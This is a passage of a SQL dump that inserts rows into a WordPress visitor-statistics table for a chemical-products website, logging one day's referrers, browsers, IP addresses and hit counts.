Ss&l10n=ru&cts=1476003855687&mc=2.62216017865', 'MSIE', 'Windows', '10.0', '', '176.14.192.127', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1986, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0.1', '', '78.100.166.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1987, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '195.154.241.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1988, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '223.72.103.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1989, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '2.186.246.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1990, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1991, '2016-10-09', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.9.1', '', '199.81.244.14', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1992, '2016-10-09', 'https://www.google.com/', 'Firefox', 'Windows', '48.0', '', '52.161.18.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1993, '2016-10-09', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '47.0', '', '128.140.33.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1994, '2016-10-09', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1204.9S3jnbN1u4ECe6IkfbkYhg0-OMlQaJH_YQpiTnMd01JFPELS64ycWZhgZ7ONvRK5.7af93695340615a557f2a3c7f462f1bc61068ca6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVGt4N1JwSmo3TVQ5ZmtsdXd3UjRrdEl0WUltWHViWXhOTkI5a2lYWGdsTU1sdGtEcFhLT09NZw&b64e=2&sign=f5e56d39c45c1748ae05c84d2824f2f5&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4cm50DWfEVrfBT3kyTLtElKfFtLs5KpT5uSJn_HVPdnDBrObfAm05aOEceQ0oBpAt9IdboTFU-02xeiqgx-MxLVLImgeVEoAfjM-kuxaSv9VBf90tN0x02w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIHXAGqhfqM8Ck4_OyQDiEHJZHHe_7dJHneju5ISwC_jcqBf8nM17JNDWSnr1nq4TVA_s4tR6sfZ91sBe8Co7s7I&l10n=ru&cts=1476005165413&mc=4.70541765207', 'MSIE', 'Windows', '8.0', '', '109.63.219.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1995, '2016-10-09', 'https://www.google.com/afs/ads?q=Electrical%20Connector%20Lubricant&lo=false&adpage=1&adrep=0&r=m&fexp=21404&client=infospace-webcrawler&channel=fb&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=p3%7Cn2&ad=n2p3&nocache=3511476012968676&num=0&output=uds_ads_only&v=3&adext=as1&bsl=10&u_his=4&u_tz=-360&dt=1476012968677&u_w=1366&u_h=768&biw=1354&bih=618&psw=1354&psh=1992&frm=0&uio=uv3cs1va1lo0sr0sl1hClh-st16sd13sv13da0-st16sd13sv13da0&jsv=91621&rurl=https%3A%2F%2Fwww.webcrawler.com%2Finfo.wbcrwl.309.x135%2Fsearch%2Fweb%3Fcid%3D132224361%26ad.segment%3Dinfo.wbcrwl.309.10%26ad.device%3Dc%26aid%3D7b0dafc6-8b36-4e7e-a2a0-900b953a39e6%26ridx%3D1%26q%3DElectrical%2520Connector%2520Lubricant%26fcoid%3D1498%26fcop%3Dresults-main%26fpid%3D2%26qlnk%3DTrue&referer=https%3A%2F%2Fwww.webcrawler.com%2Finfo.wbcrwl.309.10%2Fsearch%2Fweb%3Fq%3Ddielectric%2Bgrease%2Buses%26cid%3D132224361%26ad.segment%3Dinfo.wbcrwl.309.10%26ad.device%3Dc%26ad.keyword%3Ddielectric%2520grease%2520uses%26ad.matchtype%3Dbb%26ad.searchtermmatchtype%3Db%26ad.ismobile%3D%26ad.creative%3D7328010876%26ad.querystring%3Dwhat%2520is%2520dielectric%2520grease%2520used%2520for', 'Edge', 'Windows', '14.14393', '', '184.64.107.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1996, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1997, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1998, '2016-10-09', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1999, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2000, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '104.193.10.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2001, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '69.77.249.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2002, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '52.38.7.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2003, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2004, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2005, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2006, '2016-10-09', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1204.z0OWarOG4vU6suZ9JT0BfU30NGrjJ38ysGIQTbiV6qjH3uYBW2wmGIPmaow5jiZO.7a5f3ffc0693cddd4c6e2811cb1f122956172889&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThuVWU5WVVPWEVKbUVpbm1BdWI0VHpuNUlOSUJwRVdBc0NRNUNMZ2tKQ2h2U29DdkpOMjhGaVVn&b64e=2&sign=34237cfcd870b802e6f18cf2e5b0f85b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrudDo72incV6pSba7dqMlgzxMxvgwNY8qNNHs2F4Sj3Jv02nmwpf5CTNN1qG52_z4DjY7Klli-bdnfn6D6UMkJGqxEIUCvfbSrCLPOhQwEzRZn1cdqWwgVw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK04WAczg1EBf7MntA89F56GMZhrVnGVdUQLVUZ10MrZkeRDSkHkmlIfEJfPnaGjEWKs0aUwAxntdJ1BvakMYHq8k&l10n=ru&cts=1476013587873&mc=3.32006054761', 'MSIE', 'Windows', '8.0', '', '188.187.37.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2007, '2016-10-09', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '89.41.225.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2008, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '188.53.74.84', '000', 50, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2009, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '107.3.95.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2010, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '74.71.147.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2011, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '32.208.238.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2012, '2016-10-09', 'https://www.google.co.kr/', 'Chrome', 'Windows', '52.0.2743.116', '', '106.185.55.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2013, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '38.0.2125.111', '', '42.236.10.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2014, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.174.231.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2015, '2016-10-09', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2016, '2016-10-09', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '96.232.165.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2017, '2016-10-09', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2018, '2016-10-09', 'https://www.google.fr/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '5.196.80.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2019, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2020, '2016-10-09', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '64.145.76.110', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2021, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '64.145.76.110', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2022, '2016-10-09', 'https://www.miller-stephenson.com/wp-admin/admin-ajax.php', 'Firefox', 'Windows', '3.5.0', '', '208.51.63.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2023, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '208.51.63.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2024, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2025, '2016-10-09', 'https://www.miller-stephenson.com/krytox-faq/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 176, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2026, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '212.227.119.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2027, '2016-10-09', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiDtOL3-s3PAhXHiX4KHUJoBmYYABAF&sig=AOD64_0sK6SP_M1sW08V1PjhJMXSHlOcUg&rct=j&q=&ved=0ahUKEwil3973-s3PAhUH2R4KHeDUAoc4KBDRDAjkAw&adurl=', 'MSIE', 'Windows', '11.0', '', '98.236.184.26', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2028, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '84.212.217.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2029, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.129.148.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2030, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2031, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.89.31.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2032, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.173.63.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2033, '2016-10-09', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2034, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.195.124.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2035, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.34.80.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2036, '2016-10-09', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '24.61.40.14', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2037, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '81.31.35.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2038, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2224.3', '', '195.22.127.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2039, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.227.172.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2040, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '49.0.2623.112', '', '207.91.154.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2041, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.204.187.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2042, '2016-10-09', 'https://gotomontenegro.net/', 'MSIE', 'Windows', '5.5', '', '178.137.167.230', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2043, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.85.170.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2044, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2045, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.83.157.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2046, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2047, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '64.237.54.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2048, '2016-10-09', 'https://www.miller-stephenson.com', 'Toweyabot', 'Unknown', 'Unknown', '', '51.255.84.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2049, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.109.170.71', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2050, '2016-10-09', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2051, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.70.109.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2052, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '216.197.235.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2053, '2016-10-09', 'https://www.domain2008.com/', 'MSIE', 'Windows', '9.0', '', '192.157.231.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2054, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2055, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.71.48.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2056, '2016-10-09', 'https://www.miller-stephenson.com/miller/GPL_oils_greases.html', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.26.157.185', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2057, '2016-10-09', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2058, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.0', '', '195.22.127.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2059, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '99.105.6.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2060, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2061, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2062, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2063, '2016-10-09', 'https://www.google.com.pk/', 'Chrome', 'Windows', '53.0.2785.143', '', '39.32.88.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2064, '2016-10-09', '(null)', 'Firefox', 'Windows', '33.0', '', '159.203.196.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2065, '2016-10-09', '(null)', 'Firefox', 'Windows', '33.0', '', '192.241.234.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2066, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2067, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2068, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.10.176.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2069, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.0.10', '', '54.91.98.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2070, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2071, '2016-10-09', 'https://www.google.gr/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.170.27.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2072, '2016-10-09', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '184.97.228.73', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2073, '2016-10-09', 'https://www.google.de/', 'Firefox', 'Windows', '48.0', '', '77.188.28.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2074, '2016-10-09', 'https://komp-pomosch.ru/', 'Unknown', 'Unknown', 'Unknown', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2075, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.218.73.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2076, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '99.226.41.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2077, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.179.157.10', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2078, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '178.255.168.22', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2079, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2080, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2081, '2016-10-09', 'https://www.google.co.uk/search?q=1001f&oq=1001f&gs_l=mobile-heirloom-serp.3..41l3j0l2.4198.6130.0.6549.6.5.0.1.1.0.129.464.4j1.5.0....0...1c.1.34.mobile-heirloom-serp..0.6.491.8HiCn9AdBuw', 'Firefox', 'Android', '47.0', '', '128.211.184.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2082, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '87.58.220.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2083, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2084, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '115.68.95.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2085, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.187.103.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2086, '2016-10-09', 'https://www.google.se/', 'Chrome', 'Windows', '53.0.2785.143', '', '90.230.78.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2087, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '97.74.144.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2088, '2016-10-09', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjRvP6G0M7PAhWFZIYKHYEIAIoYABAA&sig=AOD64_0dgE53vJGRgilNWkG3LS-YumSUig&rct=j&q=&ved=0ahUKEwjqlfuG0M7PAhUMFz4KHZzlDZsQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '205.174.22.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2089, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '80.146.51.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2090, '2016-10-09', 'https://www.miller-stephenson.com', 'Domain', 'Unknown', 'Unknown', '', '167.114.156.198', '000', 733, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2091, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '85.17.66.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2092, '2016-10-09', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CCEQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=8rX6V-GDPM3_Lshl&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'Chrome', 'Android', '52.0.2743.98', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2093, '2016-10-09', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAG&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=9LX6V9raO_asZ-8b&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'Safari', 'iPhone', '9.0', '', '66.102.6.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2094, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Chrome', 'Android', '52.0.2743.98', '', '66.102.6.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2095, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Safari', 'iPhone', '9.0', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2096, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '135.23.123.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2097, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'MSIE', 'Windows', '11.0', '', '66.249.88.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2098, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.124.152.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2099, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '148.75.199.46', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2100, '2016-10-09', 'https://www.miller-stephenson.com', 'BoogleBot', 'Unknown', 'Unknown', '', '54.205.224.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2101, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '25.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2102, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.53.23.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2103, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.86.105.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2104, '2016-10-09', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjFtum3487PAhVGnpQKHY2KA14QFggrMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.135258522,d.dGo', 'MSIE', 'Windows', '11.0', '', '134.159.189.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2105, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2106, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2107, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '212.186.40.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2108, '2016-10-09', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '74.85.173.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2109, '2016-10-09', 'https://www.google.ca/', 'Safari', 'iPad', '9.0', '', '174.116.105.120', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2110, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.160.213.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2111, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.208.225.141', '000', 1, 0); 
